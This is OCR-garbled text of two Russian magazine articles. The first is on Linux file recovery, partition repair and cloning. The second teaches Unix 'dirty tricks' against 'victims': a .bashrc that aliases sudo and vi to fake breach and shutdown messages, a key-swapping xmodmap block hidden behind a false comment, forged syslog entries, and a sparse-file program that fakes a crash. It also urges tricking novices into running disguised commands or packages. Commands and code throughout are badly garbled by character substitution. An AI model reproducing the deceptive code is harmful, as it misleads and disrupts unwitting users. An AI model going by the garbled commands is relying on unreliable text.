СТК-интерфейс в стиле Раіііііоп Мадіс. 

В пакете ТезЮізкты найдешь утилиту РбоІоВес, 
предназначенную для восстановления различ- 
ныхтипов файлов с раздела внезависимости от 
используемой файловой системы. Принцип ее 
работы заключается в поиске и восстановлении 
файлов по их метаданным без анализа структу- 
ры файловой системы. РЬоІоРес способна вое- 
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другой способ восстановления файлов с ехтз 



Узнать список файлов, подлежащих восстановлению: 

# ех1:3д гер /сі еѵ/зсіа 1 --сіитр-патез 

Восстановление файла: 

# ехІіЗдгер /сі еѵ/зсіа 1 --ге5Ьге-Я1е/Ьоте/и5егМогк/очень_важный_документ.ос11 



Восстановление каталога: 

# ехЕЗдгер /сіеѵ/зсіаі --гезІюге-ЕІе/Ьоппе/изегДл/огк 

Восстановление всех файлов с момента времени 1231543545 (секунды от начала эпохи 
ІШІХ): 

# ехІіЗдгер /сі еѵ/зсіа 1 --гезФге-аІІ — а^ег=1 231 543545 





станавливать изображения (Ьтр, ]рд , рпд, Ш, 
гар гаѵѵ, гсіс, хЗр сгѵѵ, сід, огР, тгѵѵ], аудио-фай- 
лы (ѵѵаѵ, аи, трЗ, ѵѵта], видео-файлы (аѵі, тоѵ, 
трд], архивы (Ьг2, Іа г, 2 Ір], документы (бос, рсф 
Ыті, гіТ), файлы с исходниками программ (с, рі, 
зЬ]. Ряд программтакогожетипа можно найти 
в пакете БІеіЛЬ КМ: ( ѵѵѵѵѵѵ.зІеиШкікогд ). для кото- 
рого существует ѵѵеЬ-интерфейс аиіорзу. 

СЦЕНАРИИ 

ИСПОЛЬЗОВАНИЯ 

В следующих разделах мы рассмотрим 
несколько распространенныхсценариев ис- 
пользования описанныхутилит. Во-первых, это 
подробное описание процесса восстановления 
файлов с использованием трех разных под- 
ходов, во-вторых, починка файловых систем 
после сбоя, в-третьих, клонирование раздела 
на несколько машин, в-четвертых, описание 
процесса переноса данных на раздел меньше- 
го размера. 

КАСТИМ РЕ551ЖЕСТІ0М 

Для оживленияумершихфайлов на ІЧТР5 пред- 
назначена уже упоминавшаяся піТзипсІеІеІю из 
пакета піТзргодз. Она очень проста в исполь- 
зовании и чрезвычайно аккуратна. Если ты 
случайно потер файл и сразуже отмонтировал 
раздел, будьуверен — п^зипбеіеіе сможет 
вернуть его на место в целости и сохранности. 



Для начала необходимо просмотретьсписок 
всехудаленных файлов: 

# пСТзипсіеІеЦе /сіеѵ/зсіаі 

В третьей колонке вывода будетуказан процент 
сохранности файла. Если он равен 1 00% — 
все ОК, файл можетбыть возвращен кжизни 
целым и невредимым; меньшеезначение 
указывает на то, что какие-то его участки уже 
были затерты новыми данными, поэтому после 
восстановления файл окажется, что называет- 
ся, битым. В некоторых случаях возможность 
восстановления даже наполовинуубитого 
файла может сделать погоду, пока же остано- 
вимся на полностью целыхэкземплярах. Для 
этого выполним следующую команду: 

# пСТзипсіеІеЦе -р 100 /сіеѵ/зсіаі 

Ух, какже их много! Заставим программу 
вывести на экран только файлы, удаленные за 
последние 2 дня: 

# пСТзипсіеІеЦе /сіеѵ/зсіаі -р 100 -С 

2 сі 

Так-то лучше. Восстановим файл, номер Фобе 
(первая колонка вывода) которого равен 11172, 
в каталог/ипбеіеіеб: 



# пСТзипсіеІеЦе /сіеѵ/зсіаі -и -і 11172 
-сі /ипсіеІеСесі 

Файлы можно восстанавливать по маске: 

# пСТзипсіеІеЦе /сіеѵ/зсіаі -и -т 
" * . сіос " 

Фильтровать подлине: 

# пСТзипсіеІеЦе /сіеѵ/іісіаі -8 5к-бш 

Или же ты можешь восстановить все удаленные 
файлы, а уже потом разобраться, что к чему: 

# пСТзипсіеІеЦе /сіеѵ/зсіаі -и -ш 
-сі /ипсіеІеСесі 

Программа извлекает файлы со всеми 
атрибутами, включая имя и время создания. 
Пользоваться ей одно удовольствие. 

Для восстановления данных со всех остальных 
файловых систем, включая ЕАТ, II РБ, ЕХТЗ, да 
и любых других, удобнее всего использовать 
РЬоІоРес. Запускаем программу: 

# рТюСогес 

В главном меню выбираем подопытное 
устройство (например, /беѵ/зба]. Нажимаем 
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ІШІХОЮ 



К СОЖАЛЕНИЮ. ИТР5РІХ НЕ СПОСОБНА ПОЛНО- 
СТЬЮ ВЫЛЕЧИТЬ ЫТРЗ. ОНАЛИШЬ ИСПРАВЛЯЕТ 
НЕКОТОРЫЕ ИЗ ЕЕ ПРОБЛЕМ. 
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бРАКТЕй НАПРЯМУЮ ЗАВИСИТ 
ОТ ИНСТРУМЕНТОВ КОМАНДНОЙ 
СТРОКИ 

<ЕпІег> и выбираем тип таблицы разделов 
(для писюков это Іпіеі]. Далее выбираем раз- 
дел, а на следующем экране — тип файловой 
системы (ех1:2/ех1:3 или другая]. Задаем ката- 
лог, куда мы хотим поместить восстановлен- 
ные файлы, и нажимаем «У». Каталог должен 
находиться на другом разделе/диске, иначе 
ты рискуешь усугубить ситуацию, затерев 
удаленные файлы новыми данными. 

Все, начался процесс восстановления, он 
может продлиться от 1 0 минут до нескольких 
часов, в зависимости от«старости» файловой 
системы и количества удаленных файлов. Ты 
можешь остановить процесс в любой момент, 
нажав <СМ-С>, и возобновить его с места 
прерывания, вновь запустив РЬоІюПес, 

В выбранномтобой каталоге ты найдешь массу 
подкаталогов с именами вроде гесир_біг.1 , 
геси р_сІ іг.2, каждый из которых содержит боль- 
шое количество файлов разного типа. Имена 
РЬоІоРес не восстанавливает, поэтому придет- 
ся повозиться с разгребанием всей этой кучи. 

У РЬоіоВес есть и другие недостатки: 

1. Достаточно часто он дает сбои, и файлы 
могут оказаться поврежденными, поэтому их 
следует проверять на «небитость» в обяза- 
тельном порядке. 

2. Программа ищет файлы по шаблонам. 

Если ты удалил файл, формат которого не 
поддерживается РЬоІоРес — пиши пропало. 
Поэтому в довесок к рбоіогес необходимо 
иметь под рукой другие средства анализа 

и восстановления утраченных данных. 
Лучшим на этом поприще считается комп- 
лект утилит 5 Іей Л~і КМ: ( ѵѵѵѵѵѵ.зІеиЛікіЕогд ). 
содержащий огромное количество самых 
разнообразных инструментов, которые 
любят применять в своей работе различ- 
ные службы по расследованию инцидентов 
взлома и продвинутые системные админис- 
траторы. Мы далеки от этого, и нас интере- 
суюттолько две утилиты из всего комплекта: 
Л. 5 и ісаП предназначенные для поиска и 
извлечения файлов (как существующих, так 
и удаленных]. 

Просмотрим списокудаленных файлов с 
помощью утилиты Лб: 

# €1з -гсі /Леѵ/зЛЫ 
г/г * 117: ЛзсОООБ.зрд 
г/г * 119: ЛзсОООб.зрд 
г/г * 122: <ізс0007./рд 



г/г * 125: с!зс0008.зрд 
г/г * 128: с1зс0009.зрд 

Флаг ‘-г’ заставляет программу рекур- 
сивно проходить по всем каталогам, а ‘-б’ 

— показывать только удаленные файлы. 
Скорее всего, листинг будет очень длинным, 
и к тому же будет содержать список іпобе, 
которые уже были отданы другим файлам 
(строчка геаЛос в третьей колонке], поэтому 
мы его отфильтруем и направим в Іезз: 

# Из -гсі /сіеѵ/зсіаі I дгер -ѵ 
' (геаііос) ' | іезз 

В третьей колонке ты увидишь номера 
іпобе-файлов, а в четвертой — их имена. 
Чтобы выдернуть файл из ФС, воспользуйся 
командой ісаНфлаг ‘-г’ предназначен для 
восстановления удаленного файла]: 

# ісаС -г /Леѵ/зсіаі 1023 > /Лоте/ 
ѵазуа/Ртр/ту_1і1е 

Для восстановления всех файлов можно 
воспользоваться следующей командой: 

# Іог і іп 1 Из -гсі /сіеѵ/зсіаі I 
дгер -ѵ ' (геаііос) ' | \ 

аѵЛк { 'ргіпР $3 1 } I И -<5. [ : ] ’ ; сіо 
ісаР -г -1 ІаР /Леѵ/зсіЫ $і >\ 
/Лоше/ѵазуа/Цтр/іпосіе-$і ; Лопе 

Если ты желаешь найти какой-то конк- 
ретный файл, то вывод Лз можно просто 
«потрепать»: 

# Из -гсі /Леѵ/зЛаІ I дгер -ѵ 

1 (геаііос) 1 I дгер шу_Н1е.зрд 

Замечательная особенность утилит 5 Іей Лп 
КЛ состоит в том, что они используют 
множество самых разнообразных методик 
поиска удаленных файлов и их частей. Это и 
анализ управляющих структур файловой сис- 
темы, и различные эвристические методы, 
и сопоставление с шаблоном. Фактически, с 
помощью ЗІеиЛп КЛ возможно вернуть кжиз- 
ни даже файлы, затертые на ехіЗ (притом, что 
сами разработчики ехО говорято невозмож- 
ности проведения такой операции]. 

ПОЧИНКА 

ФАЙЛОВЫХ СИСТЕМ 

Починить поломавшуюся файловую систему 
очень просто. Достаточно воспользоваться 



стандартными утилитами бзек.ѵі'аі: (для фай- 
ловых систем ЕАТ1 2, ЕАТ1 6 и ЕАТ32], і'зск.іЛз 
(для ІІЕ5, ІІЕ52, ЕЕ5] и пЛзЛх (для ІЧТЕ5]. 

К сожалению, пЛзбх не способна полно- 
стью вылечить ІЧТЕ5. Она лишь исправляет 
некоторые из ее проблем и устанавливает 
флаг принудительной проверки файловой 
системы, так что следующая перезагрузка 
в ѴѴіпбоѵѵз повлечет за собой запуск ебкбзк 
для полной проверки ФС. 

Используя виртуальную машину, мы можем 
избежать необходимости перезагрузки в 
ѴѴіпбоѵѵз. Для ЭТОГО: 

1. Запускаем виртуальную машину и уста- 
навливаем винду на виртуальный жесткий 
диск. 

2. Отмонтируем раздел, содержащий файло- 
вую систему ІЧТЕ5. 

3. Запускаем виртуальную машину, в 
качестве первого жесткого диска которой 
указываем виртуальный диске ѴѴіпбоѵѵз, а 
второго — наш настоящий жесткий диск. 

4. С помощью стандартных средств ѴѴіпбоѵѵз 
запускаем проверку ЫТЕЗ-раздела. 

КОПИРОВАНИЕ РАЗДЕЛОВ 

Допустим, ты купил новый жесткий диск и хо- 
чешь перенести несколько разделов со старого 
диска на новый. Еслиты начнешь делать это 
стандартными методами, через создание но- 
вого раздела и ручное копирование файлов, то 
рискнешь поиметь массу проблем, связанных 
с кодировками имен файлов, специальными 
файлами, защищенными файлами, да и поте- 
ряешь массу времени. Лучше воспользоваться 
методом клонирования раздела. 

Пользователи ІЛМІХ клонируют разделы с по- 
мощью стандартной утилиты 66 , которую можно 
применять в связке с любой файловой систе- 
мой. Для этого на новом диске создается раз- 
дел, идентичный по размерам источнику, и вы- 
полняется команда «66 Л=раздел1 оі : =раздел2 
Ьз=1 т». Таким же образом можно скопировать 
и ЫТЕЗ-раздел, но в пакете пЛзргодздля этой 
цели есть более подходяща я утилита. 
Программа пЛзсІопе идентична по функцио- 
нальности команде сИ за исключением двух 
особенностей. Во-первых, она не копирует 
незанятые участки файловой системы, и пере- 
мещение происходит быстрее, а образ раздела 
(если ты создаешь образ] занимает меньше 
места. Во-вторых, пЛзсІопе способна хранить 
образ в специальном сжатом файле, который 
удобно передавать на другие машины. 

Для клонирования раздела достаточно выпол- 
нить следующую команду: 
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РНОТОРЕС СОБСТВЕННОЙ ПЕРСОНОЙ 



ПРОГРАММА ЫТР51Ш0ЕІ.ЕТЕ ЧЕСТНО СО- 
ОБЩАЕТОТОМ, ЧТО ФАЙЛЫ ПОЛНОСТЬЮ 
ЦЕЛЫ 



Іпо4в ГІадз %аде ОаЬѳ Зіге Е 1 Папаше 

10634 ГК.. 100% 2006-03-06 113120 Аего Вііяз^рд 

10636 ГН,, 100% 2006-03-06 246713 Аего БптезЬесі 2^рд 

10637 ГН.. 100% 2006-03-06 384621 Аего ЕптезЬесі . ]рд 
10640 ГН,. 100% 2006-03-06 140770 Аего б1авв + 3рд 

10642 ГН.. 100% 2006-03-06 314657 Авго Ноосіз, Зрд 

10643 ГН. . 100% 2006-03-06 721ЭЗ Атагіііа Гіонег-Зрд 
10646 ГН.. 100% 2006-03-06 2762І6 АиЪшп Ьеаѵеа . ;}рд 
10646 ГН,. 100% 2006-03-06 166614 Аѵаіоп ЪеаГЗрд 



РЬоЬоКас б. 10. ОаС« Яасоѵагу осііиу. Лиіу 200Й 
СЬсіасорЬ* С КЕШЕК <дг*пі«г0сда*сигііу. огд> 

//тп» . сдавсиг іЬу . огд 

агак /а»ѵ/яйя - 120 СВ / 111 СіВ (КО) - АТА ЗТ3120022А 

РаіШІов 8С«ГЪ Епй 5іі« іп иеіогі 

1 • Г гееВЗО 0 1 1 1304 234 63 20964762 



Рааа 1 - Каайтд аасСог 909664/20964762, 3248 Шм Гоипй 

Еіараосі Нам ОЬООтЗЗв - ЕаИтаІей Нам Іос асЬіеѵетеп*. 0Ы9т28 

■ К: 1745 г«соѵ*г«<1 

да: 497 г*соѵаг*4 

«1: 367 гасоѵагаб 

ЬжТ: 300 гасоѵагвв 

рпд: 167 гасоѵага4 

ггрЗ 151 гасоѵ*г«4 

Ьа2: 10 гвсоѵагаіі 

ра : 7 гасоѵвгмі 

діі: 3 гасоѵ#га4 

а: 1 гасоѵагасі 



РНОТОРЕС: ПРОЦЕСС ТОЛЬКО НАЧАЛСЯ, А 
КОЛИЧЕСТВО ВОССТАНОВЛЕННЫХ ФАЙ- 
ЛОВ УЖЕ ПЕРЕВАЛИЛО ЗА 1000 



РЪоЪоКес б. 10, Сака Несоѵегу СЪіІіѣу, (Лііу 2003 
СІІГІ в %. орН е еКЕН ХЕК <д геп і ех 0 сдз е с и г . о гд > 

Ь«р : //мт. сдзесигіъу .огд 

РЪоЪоКес із ?гее зс^Ьиаге, апсі 
сошеэ АВЗОЪЦТЕЪТ КО ИАККАНТУ, 

Зеіе-сь а тееіій (изо Аггои кеуя, Ызеп ргезз Епкег) : 



РідЗс /іівѵ/зсіа - 120 СВ / Щ 61 В [НО} - АТА ЕТ3120022Л 



Ьізк /йеѵ/зйЬ - 500 СВ / 465 СІВ (НО) - АТА ѴГОС ИЭ5000ААК5-0 



[ 0«іЬ } 

Яо^е: візк сараеіку тиз* Ье соггесЫу йеьесееа Сог а зиссеазіиі гесоѵегу. 
16 а гііак ІізЪееІ лЪоѵе Ьаа іпсоггесЬ зіге, еЬеек НО ^шорег зеЬЫпде, 0X05 
іеЬесЫоп., апгі іпзиаіі ІаЬез^ 05 раіеЪез. апгі Йіак Йгіѵегя. 
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РіРе ЗуяЬет 


Моигй РйіпЕ 
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/гіеѵ/ніаі 


іЬ. Ципкпомп 


10.06 ОіВ 
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— ЬооЕ 


ѵ /0еѵ/ігі»2 


^ ехЬепйей 


10.00 С іВ 
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В Гіпих-атар 


972.05 МіВ 






/беѵ/ніэб 


□ е*3 і 


9.05 6іВ 


7.63 &ІѲ 


1.37 ОіЗ 


/беу/збаЭ Д Ш ипкпонп /тл№ееІисІ 


91.79 СіВ 


- 


- 



# пСТзсІопе --оѵегшгіСе /йеѵ/кйаі /йеѵ/ЬйЫ 

Адля создания образа: 

# пСТзсІопе --заѵе-ішаде --оиДриД Ьаскир.ішд 
/Йеѵ/Ъ.йа1 

Утилита пйзсіопе особенноудобна, еслиты решил скопиро- 
вать установленный ѴѴіпбоѵѵз на целый паркдругих машин 
(учебный класс или офис]. Для этого достаточно установить 
ѴѴіпсІоѵѵз на одну машину и создать образ, который затем 
можно выложить в шару и с помощью Гіпих ГіѵеСй залить 
на другие машины. Чтобы они смогли загружаться, придет- 
ся также скопировать МВР-запись диска: 

# зТйізк — й /йеѵ/зйа > /зкаге/зйа-зТйізк . сіитр 

# сісі іТ=/йеѵ/зйа Ьз = 512 соипД = 1 оД = /зкаге/ 
зйа-тЪг . йитр 

А затем записать ее на диск всех машин: 

# зДйізк /йеѵ/зйа < /зкаге/зйа-з Дйізк . йитр 

# йй іТ=/зкаге/ зйа-тЪг . йшпр оД=/йеѵ/зйа 

ПЕРЕНОСДАННЫХ 

Если ты решил полностью перейти на Ыпих, но не хочешь 
использовать различные ухищрения и піТз-Зд для доступа к 
своим старым данным, расположенным на І\ІТР5-разделе? 
Ведь этот раздел можетзанимать большую часть диска, и 
нет никакой возможности просто скопировать его содер- 
жимое на новый раздел, отформатированный в ех!:3/ех1:4. В 
этом случаетебе на помощь опять придут утилиты из пакета 
пйзргодз, а точнее одна из них — пйзгезке, которая поз- 
волит копировать данные небольшими порциями в новую 
файловую систему с последующим уменьшением размера 
ЫТГЗ-раздела и увеличением ех!:3/ех1:4-раздела. Для 
этого тебе понадобится какой-нибудь ГіѵеСО, содержащий 
пйзргодз и е2іъргод5 версии не ниже 1 .41 (для поддержки 



ех!:4, если ты, конечно, собираешься переносить данные 
на нее). Также оченьжелательно, чтобы РіѵеСО содержал 
свеженький драгіеб, потому что изменять размер вручную 
трудно и опасно (кроме изменения размера самой ФС, 
предстоит менять размер раздела с помощью ійізк, одна 
ошибка и всю операцию придется начинать сначала]. 
Загружаемся с РіѵеСО и монтируем разделы жесткого 
диска. Допустим, его размер составляет 120 Гб. Из них80 
Гб — под завязку набитый ЫТРЗ-раздел, а остальные 30 Гб 
(да, именно 30, после перевода маркетинговых гигабайт 
в настоящие объем диска оказывается равным примерно 
111 Гб] — это раздел сустановленным Гіпих, занятость 
которого составляет 5 Гб. Значит, наше «окно» равно 
примерно 25 Гб. Перемещаем файлы с ЫТГЗ-раздела на 
ех1:3/ех1:4-раздел до тех пор, пока их совокупный размер 
не станет равен размеру окна. В результате последний 
оказывается полностью заполненным, а первый «худеет» 
на 25 Гб. Отмонтируем оба раздела и запускаем драгіеб. 
Выбираем ЫТГЗ-раздел, жмем вторую кнопку мыши, 
выбираем Везке/Моѵе и уменьшаем раздел на размер 
окна, выбираем ех!:3/ех1:4-раздел и увеличиваем его на тот 
же размер окна (раздел придется сдвинуть к началу диска, 
а затем увеличить]. Так мы получаем еще 25 Гб освободив- 
шегося места, что позволит нам скопировать часть файлов, 
а затем вновь изменить размер. Четыре таких прохода, и 
мы полностью удаляем ЫТГЗ-раздел, а раздел ех1:3/ех1:4 
расширяем на весьдиск. 

выводы 

Какты смогубедиться, Гіпихумеет нетолько работать с 
множеством сторонних файловых систем, но и оснащен 
массой утилит для их модификации, проведения диа- 
гностики и выполнения других операций. Ты никогда не 
окажешься в безвыходной ситуации, держа под рукой 
ГіѵеСО на базе Гіпих, который как раз и является тем самым 
Святым Граалем любого системного администратора и 
пользователя, т 



6РАКТЕ0: 
ЗАЧЕМ НАМ 
РАКТІТІОМ 
МА6ІС? 




НТТР://ѴѴѴШ 

■ ■ 

> Ііпкз 

• ІюгетозГзоигсеІюгде. 

пе — Гогетозреще 
одна популярная 
программа для восста- 
новления файлов по 
шаблонам. 

• 

от — Зузіепп Гезсие 
СО содержит все 
упомянутые в статье 
программы. 



ХАКЕР 1 1 /131/ 09 



► 075 







ІЛМІХОЮ 



■ ■ ЕВГЕНИЙ ЗОБНИН ІОВЫ шгаѳм АН. СОМ, АНДРЕЙ МАТВЕЕВ АЫ ОВиЗНОСКіаКЕАІ-.ХАКЕР.Ки 




Энциклопедия ІШ-западлостроений 



В ЦІ N IX есть все для осуществления самых разнообразныхзападло- 
строений: свобода действий пользователя, полный доступ ко всем, даже 
самым сокровенным, уголкам операционки, открытые исходныетексты, 
богатейший арсенал инструментария на все случаи жизни. Получив до- 
ступ к системе или просто заставив пользователя запустить показанную 
ему команду, ты с легкостью ввергнешь свою жертву в состояние шока, 
глубина которого будетзависеть только оттвоих моральных принципов. 



О собую привлекательность 1)І\ІІХ-за- 
падлостроения получаютименно 
сейчас, когда все поголовно начина- 
ют переползать на І_іпих. Пингвина 
уста на вливают дома, в школах, 
институтах, различных гос. учреждениях, на 
нетбуки, телефоны. И всем этим пользуются 
рядовые чайники, которым можно запросто 
впарить беЬ-пакет с программой-ускорителем 
интернета, заставить выполнить странную 
команду, которая якобы активирует механизм 
автоматического распараллеливания прило- 
жений по всем доступным ядрам процессора, 
научить печатать перед любой предложенной 
ему командой слово зисіо. Какой простор для 
западлостроителя! Теперь не надо ломать 
голову над запрятыванием своих форк-бомб 
и шелл-функций в систему, необязательно ло- 
мать комп жертвы, достаточно уверить ее в том, 
что ты проженный жизнью Гик, который видел 
выход Зіаскѵѵаге 3.0 собственными глазами и 
компилировал ядро І_іпих 1 .1 . Все, дело сдела- 
но. Он сам прибежит ктебе за помощью, когда 
споткнется об очередной камень ІЛэипШ Ыпих. 

ШУТКИ 

Начнем с самых простых и совершенно без- 
обидных приколов, которыеты сможешьуст- 
раивать с целью поднять настроение нетолько 
себе, но и жертве. Целевая аудитория: друзья и 
знакомые с хорошим чувством юмора. 

Из всех способов удачно подколоть жертву 
наиболее простой и эффективный заключается 
в том, чтобы заменить одну или несколько часто 
используемых команд на псевдоним, выпол- 
няющий подложную команду (набор команд). 
Так, например, ты можешь посоветовать жертве 



свой собственный .Ьазбгс, который содержит 
ряд полезнейших функций, красиво раскра- 
шенное приглашение и улетные настройки, 
но в его конецты поместишь что-нибудь вроде 

ЭТОГО: 

аііаз зибо= ' есію -е "\е[1;1Н\ 
е [2бМабгіх НА8 уои... " ; зіеер 60 0 1 

Если жертва не особо сильна в шелл-скрип- 
тинге, то скорее всегоона простозаменит 
свой .Ьазбгс твоим продвинутым вариантом и 
продолжитспокойно осваивать премудрости 
командной строки... Ровно до того момента, 
пока не вызовет команду зисіо, результатом 
чего станетзатирание всего экрана и появ- 
ление надписи «Маітіх НА5 уои...» в левом 
верхнем углу экрана. Также в .ЬазЬгс можно 
добавить инициализацию и экспорт перемен- 
ной ТМ01Я, отвечающей за автоматическое 
закрытие шелла во время бездействия: 

ехрогб ТМОЦТ=Ю 

Результат: десятисекундный простой и опа, — 
шелл закрылся. Пока жертва разберется, что к 
чему, постоянные «падения» интерпретатора 
ее доконают. 

С помощью команд, прописанных в .Ьазбгс.ты 
можешь сделать очень многое. Например, под- 
менить клавиши клавиатуры вХѴѴіпбоѵѵ. Для 
этого помести в подложный .Ьазбгс следующий 

КОД: 

$ VI .ВА5НВС 

# Этот код чинит клавиатурные комби- 
нации в Еігебох 



Іб [ $БІЗРЬАУ ! = ббеп 

а= ' хшобшар -рке I дгер 1 а А ' | сиб 
-б ' ' -б 3 * 

з= 'хшобшар -рке I дгер ’з 5 1 I сиб 
-б 1 1 -б 3 1 

хшобшар -е " кеусобе $а = з 8" > / 
беѵ/пиіі 2>&1 

хшобшар -е "кеусобе $з = а А" > / 
беѵ/пиіі 2>&1 
бі 

Новичок в ряд л и разберется в том, что конк- 
ретно делают эти команды, и просто поверит 
комментарию. На самом же деле код меняет 
клавиши ‘а’ и з’ местами, так что жертва будет 
долго материться, полагая, что разучилась пе- 
чатать, а затем и вовсе отправится в магазин за 
новой клавиатурой. Будетеще смешнее, если 
заменить местами клавиши з и I и заставить 
жертву установить программу зі, результатом 
которой будет проносящийся справа-налево 
поезд, нарисованный с помощью азсіі агб 
Безобидные шутки с выводом различных сооб- 
щений на экран монитора также могут вызвать 
бурю эмоций. 

$ѴІ -/.ВА5НКС 

шгаррег ( ) { 

БАТЕ=$ (ЬС_АЬЬ=еп бабе +'%с') 

ТТУ=$ (Ьазепаше 'ббу') 
есбю -е «Вгоабсазб шеззаде бгош 
$6Г8ЕК (рбз/$ТТУ) ( $БАТЕ) \п\пТЬ.е 
зузбеш із доіпд боѵлт бог зузбеш каіб 
ЫСЖ» 

зіеер 500 

} 

аііаз ѵі=ѵ\пгаррег 
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В итоге вызов редактора ѵі приведет к печати 
примерно такого сообщения: 

ВгоабсазР шеззаде Ргот ѵазуа (/ 
беѵ/рРз/0) Тйи 24 Зер 2009 14:50:50 
УЕКЗТ 

Тйе зузРет із доіпд бсжп Рог зузРет 
йаІР ЖЖ! 

Вариант на языке Си (здесь и далее по 
тексту объявления заголовочных файлов и 
проверки на возвращаемые функциями зна- 
чения опущены для экономии журнального 
пространства): 

$ѴІ5Ѵ5І_0е-РАКЕ.С 

іпР таіп(ѵоіб) 

{ 

ехРегп сопзР сйаг * 

ргодпате ; 

сйаг ЪиР [ 12 8 ] , йозРпате [2 56] ; 

// скрываем имя нашей программы 
ргодпате = " " ; 

( ѵоіб) деРйозРпате (йозРпате , 



зігеоР (йозРпате) ) ; 

// подготавливаем фейковое сооб- 
щение о немедленном выключении 
компьютера 

зпргіпРР (ЪиР , зігеоРЪиР, 

" *** ЕШАЙ ЗузРет 

зйиРбоѵ/п шеззаде Ргот гооР@%з *** 
ЗузРет доіпд боші ІММЕБІАТЕЙУ " , 
ЙозРпате) ; 

зузіод (ЬОС_ЕМЕЕС, Ьиі) ; 
ехіР ( 0 ) ; 

Первый аргумент функции зузіод О говорит 
отом, что сообщение является экстренным, 
поэтому оно попадет не только в логи системы 
зузіод, но и будет выведено в консоль. 

Многие не знают о том, что в *піх-системах 
любой пользователь может вызвать систему 
регистрации событий и создать журнальные 
записи, якобы посланные каким-либо демо- 
ном или программой. Для примера симитиру- 
ем работу почтового демона рораЗб: 

$ѴІ Р0РА30-РАКЕ.5Н 

# ! Ып/зй 



есйо ' АиРйепРісаРіоп раззеб іог 
риркіп' | Іоддег -і -Р 'рораЗб' -р 
баетоп . іпРо 

есйо '13 теззадез (31337 ЬуРез) 
Іоабеб' I Іоддег -і -Р 'рораЗсН -р 
баетоп . іпРо 

есйо '13 (31337) беІеРеб, 0 (0) 

ІеРР' I Іоддег -і -Р ’рораЗб' -р 
баетоп . іпРо 

Еще один тип шуток эксплуатирует способ- 
ность файловых систем ІЛ\І IX- подобных ОС к 
упаковке так называемых «файловых дыр». 
Если в файловую систему записывается файл, 
содержащий достаточно длинный участок 
нулей (длиной, по крайней мере, в один блок), 
то выделения блоков для размещения этих 
данных не происходит, а все ссылки на блоки, 
содержащие нули, помечаются специальным 
битом. Впоследствии «нулевые» блоки могут 
быть выделены ФС, но до этого времени они 
не занимают место на диске. Эта особенность 
используется Іоггепйклиентами для создания 
пустых файлов, в разные места которых со вре- 
менем будут помещаться скачанные данные 
(а место для них будет выделяться файловой 
системой по мере надобности). 

Тотже прием можно использовать для «запу- 
гивания»жертвы: мы просто создаем необы- 
чайно длинный файл и наполняем его нулями. 
В результате в файловой системе появляется 
огромный файл, который на самом деле не 
занимает места. Вот код на Си: 

$ѴІНОІ_Е.С 

іпР таіп(ѵоіб) 

{ 

сопзР сйаг *Рпате = " /Ртр/ 
зигргізе" ; 

сопзР сйаг *тузРгіпд = 

" аааааа " ; 

оРР_Р туоРРзеР = 1048576000; 

іпР Рб; 

ореп ( Рпате , 0_СКЕАТ | 0_ТКШС 
I 0_КШК , 0600); 

шгіРе(Рб, тузРгіпд, 
зРгІеп (тузРгіпд) ) ; 

1зеек(Рб, туоРРзеР, 8ЕЕК_ 

СбЕ) ; 

ѵ^гіРе(Рб, тузРгіпд, 
зРгІеп (тузРгіпд) ) ; 

ргіпРР ( " ЗедтепРаРіоп 
РаиІР\п" ) ; 

ехіР ( 0 ) ; 

} 

Заменяем строкуДтр/зигргізе на путьдо 
нашего фиктивного файла. Компилируем: 

$ дсс йоіе.с -о соо1_арр 

Подсовываем жертве. Она запускает програм- 



} 
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ІШІХОЮ 



]1т$)1ш-с1е$кіор:/Ітр$ дсс Ьоіе.с -о Ьоіе 

]1т$]іт-с)е&кіор:/Ііпр$ 1$ -I Гіоіе 

-гыхг-хг-х 1 }1т 11т 9333 2ѲѲ9-Ѳ9-24 16:43 

) 1т®1 1т - йеькіор : / 1тр$ ./Иоіе 

мго(е 6 ЬуІе$ 

ьеек 1Ѳ48576ѲѲѲ Ьуіеі 

мго(е 6 Ьуіеь 

11тв)1т-с)е&кіор:/Ііпр$ Іь -I іигргіхе 

•гм 1 11яі )1т 1048576012 2009 -09 -24 16:44 іигргіів 

) 1т@і 1т • сіеікіор : /Ттр$ | 

Файловая дыра: все гениальное 



ДЯ$1 Л ІвГ і ІИ (1, ЛОМ»}; йа ССІ» Ч 
І Іта] ■ гімкКин -1 ІкшЬ 

■ ГЧ-Г"Г'- 1 )!■ ] 1 й МММ 2 &И. 09 Л 4 1 ѴЭ* Ь<ИЬ 
Лі4ІІЯ'іІпк1«р;-І Ьіір2 ЬдяЬ 
| ІІВД 1* '<№4кІ4Ч>: -$ Іі .1 ІЮ&Ь.ЫІ 
- гМт Г-. - Гт - I 11- 11» 53 2ИЧ99ІИ М:5в Ж ш*-Ы2 



Простой рецепт, какѵжатьфайл 
любой длины в несколько десятков 
байт 



Лч^т-ситое^ 1 ! у«рй*г() { 

> ЫТЕ-5аС ЛЛе 

> тгдетиил** ’тту’і 

* мне С '8Гй«ІСйі1 Г гм ЯІ5ЕЯ ГрІЗ/ЛТГ] (ЩАТЕ|-\П\пТИе і 

уіііи Іі доіид 4оѵп Гог іѵіШ ИвИ N04” 

> Ымр 5» 

* ], 

ІІоЗДІа-йиктар:-* аііа* ѵі^рирр*г 
}1р4;1п-йггкТор:-1 ѵі .Ьаі&гс 

ВмийсплЕ Г™ |1» ІРГІ Бер 35 13:?В:ЗЯ 2М91 

Готов поспорить, что ни один юник- 
соид не ждет от команды ѵі такой 



просто 



реакции 



му и получает на экран «ВедтепІаТоп і'аиіі». 
После чего ты говоришь ей, что, мол, бывает, 
попробуй запуститьудруга... В конце концов 
жертва забываетоб этой программе и в один 
прекрасный день натыкается на файл, размер 
которого равен 1 048576012 байт! Почти тера- 
байт! Далее можно начинать ржать над тем, как 
наш лопух рассказывает всем, что нашел у себя 
в системе (с жестким диском на 500 Гб] файл, 
размером в один терабайт. Шутка станет еще 
более смешной, если файл упрятать в систему 
достаточно хорошо. Дело в том, что многие 
файловые системы возвращают размер сво- 
бодного/занятого пространства сучетом этих 
самых нулевых блоков, и получится, что после 
создания файла команда сГ будет показывать 
полную занятость раздела (если, конечно, он 
не больше 1 Тб], что совсем не соответствует 
истине. 

Но это все невинные шалости, конкретные 
подколы начнутся в том случае, если ты полу- 
чишь доступ к компу жертвы с правами гооГ 
Тогда тебе откроется настоящий простор для 
западлостроений. Например, можно изме- 
нить загрузочное меню дгиЬ (файл /ЬооѴдгиЬ/ 
тепи.ізі) и прописать в нем ѴѴіпбоѵѵз 95 вместо 
ІІЬипІи Ыпих, подсунуть другую иконку главного 
меню Споте (/изг/збаге/ісопз/дпоте/зсаІаЫе/ 
